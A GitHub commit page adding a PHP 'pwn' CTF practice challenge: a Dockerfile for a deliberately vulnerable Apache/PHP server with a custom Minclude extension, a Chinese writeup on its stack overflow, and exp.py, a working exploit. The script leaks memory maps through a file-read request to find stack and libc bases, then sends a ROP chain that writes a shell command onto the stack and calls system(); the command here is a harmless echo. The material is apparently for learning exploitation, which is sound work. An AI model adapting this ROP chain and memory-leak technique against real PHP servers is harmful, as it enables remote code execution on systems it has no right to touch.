add flare-rmu

DMIND-NLL · May 8, 2020 · a9e9ccc · a9e9ccc
1 parent d44e82e
commit a9e9ccc
Show file tree

Hide file tree

Showing 10 changed files with 2,058 additions and 0 deletions.
diff --git a/PHP_PWN_LEARN/stack_overflow/Dockerfile b/PHP_PWN_LEARN/stack_overflow/Dockerfile
@@ -0,0 +1,34 @@
+FROM ubuntu:18.04
+
+RUN sed -i "s/http:\/\/archive.ubuntu.com/http:\/\/mirrors.tuna.tsinghua.edu.cn/g" /etc/apt/sources.list
+RUN apt-get update && apt-get -y dist-upgrade
+RUN apt-get -y install vim
+RUN apt-get -y install tzdata
+RUN apt-get -y install php
+RUN apt-get -y install apache2
+RUN apt-get -y install libapache2-mod-php
+RUN apt-get install -y wget nginx gdb git unzip
+
+RUN set -xe \
+    && git clone https://github.com/longld/peda.git   ~/peda \
+    && git clone https://github.com/scwuaptx/Pwngdb.git  ~/Pwngdb \ 
+    && cp ~/Pwngdb/.gdbinit ~/
+
+COPY ./Minclude.so /usr/lib/php/20170718/Minclude.so
+RUN chmod 755 /usr/lib/php/20170718/Minclude.so
+RUN rm /var/www/html/index.html
+COPY index.php /var/www/html/index.php
+RUN chmod 755 -R /var/www/html/
+COPY flag /flag
+RUN chmod 755 /flag
+COPY ./php.ini /etc/php/7.2/apache2/php.ini
+RUN chmod 755 /etc/php/7.2/apache2/php.ini
+RUN echo "" > /etc/php/7.2/apache2/conf.d/20-json.ini
+
+
+EXPOSE 80
+
+CMD apachectl -X & tail -F /var/log/apache2/access.log
+
+#CMD service apache2 start & tail -F /var/log/apache2/access.log
+# docker run -it -d -p8088:80 --privileged 5e2dceb47231
diff --git a/PHP_PWN_LEARN/stack_overflow/Minclude.patch.so b/PHP_PWN_LEARN/stack_overflow/Minclude.patch.so
diff --git a/PHP_PWN_LEARN/stack_overflow/Minclude.so b/PHP_PWN_LEARN/stack_overflow/Minclude.so
diff --git a/PHP_PWN_LEARN/stack_overflow/REAMD.md b/PHP_PWN_LEARN/stack_overflow/REAMD.md
@@ -0,0 +1,26 @@
+### 前言
+
+此题目比较简单，作为我学习php pwn的第一课。
+
+其实就是个简单的栈溢出，本身跟php没啥关系，唯一的贡献是我知道了怎么调试libphp。
+
+### writeup 
+
+Minclude 扩展的的函数 `zif_Minclude` 存在花指令，导致栈不平衡。
+
+![](img/2020-05-08-17-25-47.png)
+
+其实相当于一个 `jmp`，跳转到了 `rax + 8` 的位置，所以把这些指令都nop掉，直接跳转到 `0x124d`就好了。
+
+接着就是 `000000000000129D call    _memcpy` 导致的一个栈溢出。就是个普通的栈溢出，找rop就可以解了。
+
+但是php扩展中，下图中的代码会修改栈上的数据，影响最后进行rop，所以这里需要放一些无用的数据，防止破坏payload，在真实利用过程中此处使用4个pop操作进行绕过。
+
+![](img/2020-05-08-18-02-59.png)
+
+最后一个坑点问题，就是我用pwn师傅给的payload一直打不通，主要是因为调用 system 函数的时候指令 `movaps xmmword ptr [rsp+0x40], xmm0 `奔溃了。查了一些资料才知道 [http://blog.binpang.me/2019/07/12/stack-alignment/](http://blog.binpang.me/2019/07/12/stack-alignment/)，这条指令要求 rsp必须是16字节对齐的，所以需要修改一下栈布局，让调用system函数的时候rsp是16字节对齐的即可。
+
+
+### 版权
+
+该题目复现环境尚未取得主办方及出题人相关授权，如果侵权，请联系本人删除（[email protected]）
diff --git a/PHP_PWN_LEARN/stack_overflow/exp.py b/PHP_PWN_LEARN/stack_overflow/exp.py
@@ -0,0 +1,69 @@
+import requests
+import sys
+import os
+from pwn import *
+
+#7f6d180cb000
+
+def getBaseAddr():
+    filename = "/proc/self/maps"
+    data = {
+        "a":filename,
+    }
+    url = "http://myip:8088"
+    r = requests.post(url, data=data)
+    contents = r.text.split("\n")
+
+    for content in contents:
+        if "[stack]" in content:
+            stackBase = int(content.split("-")[0],16)
+            break
+
+    for content in contents:
+        if "libc-2.27.so" in content:
+            libcBase = int( content.split("-")[0],16 )
+            break
+
+    return stackBase,libcBase
+
+stackBase , libc_addr = getBaseAddr()
+
+log.success("Find stackBase addr is {}, libcBase addr is {}".format(stackBase,libc_addr))
+
+# libc_addr=0x00007ffff70f3000
+
+pop_rdi=libc_addr+0x02155f     # 0x7ffff711455f  pop rdi; ret 
+mov_rdx_rdi=libc_addr+0x1011aa # 0x7ffff71f41aa   mov    QWORD PTR [rdx],rdi ; ret
+pop_rdx=libc_addr+0x1b96       #0x7ffff70f4b96   pop    rdx ; ret 
+
+shell_addr = stackBase # stack base address 
+s="echo kirin > /tmp/123\x00"
+pop4_ret=libc_addr+0x000000000002219e  # 0x7ffff711519e ;pop    r13 ; pop    r14 ;pop    r15;pop    rbp; ret
+
+payload=p64(pop_rdx)*10+p64(pop4_ret)+p64(0)*4 + p64(pop4_ret)+p64(0)*4
+
+for i in range(len(s)//8+1):
+    payload+=p64(pop_rdx)
+    payload+=p64(shell_addr+i*8)
+    payload+=p64(pop_rdi)
+    payload+= bytes(s[i*8:i*8+8].ljust(8,"\x00"),encoding="latin-1")
+    payload+=p64(mov_rdx_rdi)
+
+payload+=p64(pop_rdi)+p64(shell_addr)
+payload+=p64(libc_addr+0x04f440 )
+
+global INITIAL
+# filename="/proc/self/maps"
+
+filename = bytes("a"*0x88,encoding="latin-1") + payload
+data = {
+    "a":filename,
+}
+
+url = "http://myip:8088"
+r = requests.post(url, data=data)
+print(r.content)
+
+# hex(0x00007ffff70f3000+0x1b96)
+
+# http://blog.binpang.me/2019/07/12/stack-alignment/
diff --git a/PHP_PWN_LEARN/stack_overflow/flag b/PHP_PWN_LEARN/stack_overflow/flag
@@ -0,0 +1 @@
+flag{123456}
diff --git a/PHP_PWN_LEARN/stack_overflow/img/2020-05-08-17-25-47.png b/PHP_PWN_LEARN/stack_overflow/img/2020-05-08-17-25-47.png
diff --git a/PHP_PWN_LEARN/stack_overflow/img/2020-05-08-18-02-59.png b/PHP_PWN_LEARN/stack_overflow/img/2020-05-08-18-02-59.png
diff --git a/PHP_PWN_LEARN/stack_overflow/index.php b/PHP_PWN_LEARN/stack_overflow/index.php
@@ -0,0 +1,7 @@
+<?php
+ if (!extension_loaded('Minlcude')) {
+    echo 'skip';
+}
+
+Minclude($_POST['a']);
+?>